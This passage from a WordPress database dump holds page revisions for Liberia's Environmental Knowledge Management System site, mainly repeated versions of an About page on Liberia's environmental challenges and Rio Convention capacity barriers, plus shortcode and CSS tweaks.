contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-12 12:40:56','2019-11-12 12:40:56','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(1965,1,'2019-11-12 12:42:34','2019-11-12 12:42:34','[posts_table post_type=\"document\"\ncolumns=\"id,title,\nexcerpt,\ntax:resource_tag:Uploaded By,\ntax:resource_category:Categories,\n\" width=\"400px,450px,auto,auto\"]','Documents Database','','inherit','closed','closed','','91-revision-v1','','','2019-11-12 12:42:34','2019-11-12 12:42:34','',91,'https://ekmsliberia.info/91-revision-v1/',0,'revision','',0),(1966,1,'2019-11-12 12:53:23','2019-11-12 12:53:23','<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" tax:resource_tag=\"epa\",\ncolumns=\"id,title,\nexcerpt,\ntax:resource_category:Categories,\n\" width=\"auto,400px,450px,auto,auto\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-12 12:53:23','2019-11-12 12:53:23','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(1967,1,'2019-11-12 12:54:59','2019-11-12 12:54:59','<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" tax:resource_tag=\"epa\"\ncolumns=\"id,title,\nexcerpt,\ntax:resource_category:Categories,\n\" width=\"auto,400px,450px,auto,auto\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-12 12:54:59','2019-11-12 12:54:59','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(1968,1,'2019-11-12 12:57:14','2019-11-12 12:57:14','<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" tax=\"resource_tag:epa\"\ncolumns=\"id,title,\nexcerpt,\ntax:resource_category:Categories,\n\" width=\"auto,400px,450px,auto,auto\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-12 12:57:14','2019-11-12 12:57:14','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(1969,1,'2019-11-12 13:00:44','2019-11-12 13:00:44','<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" term=\"tax:\"resource_tag\":\"epa\"\ncolumns=\"id,title,\nexcerpt,\ntax:resource_category:Categories,\n\" width=\"auto,400px,450px,auto,auto\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-12 13:00:44','2019-11-12 13:00:44','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(1970,1,'2019-11-12 13:00:53','2019-11-12 13:00:53','<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" term=\"tax:resource_tag\":\"epa\"\ncolumns=\"id,title,\nexcerpt,\ntax:resource_category:Categories,\n\" width=\"auto,400px,450px,auto,auto\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-12 13:00:53','2019-11-12 13:00:53','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(1971,1,'2019-11-12 13:01:10','2019-11-12 13:01:10','<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" term=\"resource_tag\":\"epa\"\ncolumns=\"id,title,\nexcerpt,\ntax:resource_category:Categories,\n\" width=\"auto,400px,450px,auto,auto\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-12 13:01:10','2019-11-12 13:01:10','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(1972,1,'2019-11-12 13:02:54','2019-11-12 13:02:54','<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,\ntax:resource_category:Categories,\n\" width=\"auto,400px,450px,auto,auto\" terms=\"<resource_tag>\":\"<epa>\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-12 13:02:54','2019-11-12 13:02:54','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(1973,1,'2019-11-12 13:03:17','2019-11-12 13:03:17','<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,\ntax:resource_category:Categories,\n\" width=\"auto,400px,450px,auto,auto\" term=\"<resource_tag>\":\"<epa>\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-12 13:03:17','2019-11-12 13:03:17','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(1974,1,'2019-11-12 13:04:07','2019-11-12 13:04:07','<p>The Agency is mandated to protect the environment and sustainable use of natural resources in consultation with relevant line Ministries, Agencies and organizations, and other relevant stakeholders. EPA ensures that the environment is clean, safe and healthy.</p>		\n			<h2>Featured Projects</h2>		\n			<h2>Related Documents</h2>		\n		[posts_table post_type=\"document\" \ncolumns=\"id,title,\nexcerpt,\ntax:resource_category:Categories,\n\" width=\"auto,400px,450px,auto,auto\" term=\"resource_tag:epa\"]','Environmental Protection Agency','','inherit','closed','closed','','1582-revision-v1','','','2019-11-12 13:04:07','2019-11-12 13:04:07','',1582,'https://ekmsliberia.info/1582-revision-v1/',0,'revision','',0),(1988,1,'2019-11-13 00:34:23','2019-11-13 00:34:23','/* Hide header button from 1024pxpx */\n@media (max-width: 1024px) {\n	.hide-1024.elementor-column {\n		display: none;\n	}\n}\n\n/* Color of the footer newsletter form */\n#footer .oceanwp-newsletter-form-wrap input[type=\"email\"] {\n	color: #fff;\n}\n\n/* Show related post */\n.entry-related{\ndisplay:true;\n}','oceanwp','','inherit','closed','closed','','34-revision-v1','','','2019-11-13 00:34:23','2019-11-13 00:34:23','',34,'https://ekmsliberia.info/34-revision-v1/',0,'revision','',0),(1990,1,'2019-11-13 00:35:54','2019-11-13 00:35:54','/* Hide header button from 1024pxpx */\n@media (max-width: 1024px) {\n	.hide-1024.elementor-column {\n		display: none;\n	}\n}\n\n/* Color of the footer newsletter form */\n#footer .oceanwp-newsletter-form-wrap input[type=\"email\"] {\n	color: #fff;\n}','oceanwp','','inherit','closed','closed','','34-revision-v1','','','2019-11-13 00:35:54','2019-11-13 00:35:54','',34,'https://ekmsliberia.info/34-revision-v1/',0,'revision','',0),(1998,1,'2019-11-13 09:54:25','2019-11-13 09:54:25','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width:100%\">\n  <tr>\n    <th><strong>Project Name</strong></th>\n    <th><strong>Description of project’s alignment with CCCD project</strong></th>\n </tr>\n  <tr>\n    <td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n    <td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty. </td>\n     </tr>\n  <tr>\n    <td>FAO to Support MOA Statistics and Information Management System</td>\n    <td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n   </tr>\n<tr>\n    <td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC) </td>\n    <td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n   </tr>\n</table>\n<h3>B. Strategy</h3><h4>B.1 Alternative Strategies</h4><p>\nDuring the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia.  An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project .  A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.\n</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the United Nations Development Programme (UNDP) - the Global Environmental Facility (GEF) for the development of this Environmental Knowledge Management System (EKMS).</p>		\n			<h2>Disclaimer</h2>		\n		<p>The Environmental Knowledge Management System (EKMS) provides free and open access to important information from key government and other institutions in Liberia on implementation of the Rio Conventions. The information in the EKMS is provided for informational and educational purposes only. This website contents can not be taken to reflect the views of its sponsors.</p>','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-13 09:54:25','2019-11-13 09:54:25','',68,'https://ekmsliberia.info/68-revision-v1/',0,'revision','',0),(2000,1,'2019-11-13 09:58:05','2019-11-13 09:58:05','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and other Liberia government institutions as well as Nongovernmental Organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the 